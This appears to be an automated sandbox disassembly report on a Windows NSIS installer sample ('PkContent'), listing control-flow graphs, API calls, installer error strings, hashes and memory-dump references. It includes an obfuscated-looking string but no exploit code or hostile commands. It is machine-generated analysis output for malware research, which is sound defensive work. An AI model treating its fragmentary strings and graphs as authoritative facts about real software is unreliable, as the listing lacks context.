                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 608394941-1650083594
                                                • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • lstrcatW.KERNEL32(00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401A76
                                                • CompareFileTime.KERNEL32(-00000014,?,TravelersDevelopingImpactsJewsInstructorOriginal,TravelersDevelopingImpactsJewsInstructorOriginal,00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401AA0
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TravelersDevelopingImpactsJewsInstructorOriginal
                                                • API String ID: 4286501637-4034153992
                                                • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403598
                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                Strings
                                                • soft, xrefs: 00403675
                                                • Null, xrefs: 0040367E
                                                • Inst, xrefs: 0040366C
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                • Error launching installer, xrefs: 004035D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                • GetTickCount.KERNEL32 ref: 00403464
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                • wsprintfW.USER32 ref: 004034A4
                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CountFileTickWrite$wsprintf
                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                • API String ID: 651206458-1535804072
                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                APIs
                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                • String ID:
                                                • API String ID: 2740478559-0
                                                • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                APIs
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID: Exch: stack < %d elements$Pop: stack empty$TravelersDevelopingImpactsJewsInstructorOriginal
                                                • API String ID: 1459762280-2310787730
                                                • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 3376005127-0
                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                • String ID:
                                                • API String ID: 2568930968-0
                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                APIs
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                Strings
                                                • TravelersDevelopingImpactsJewsInstructorOriginal, xrefs: 00402770
                                                • <RM>, xrefs: 00402713
                                                • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
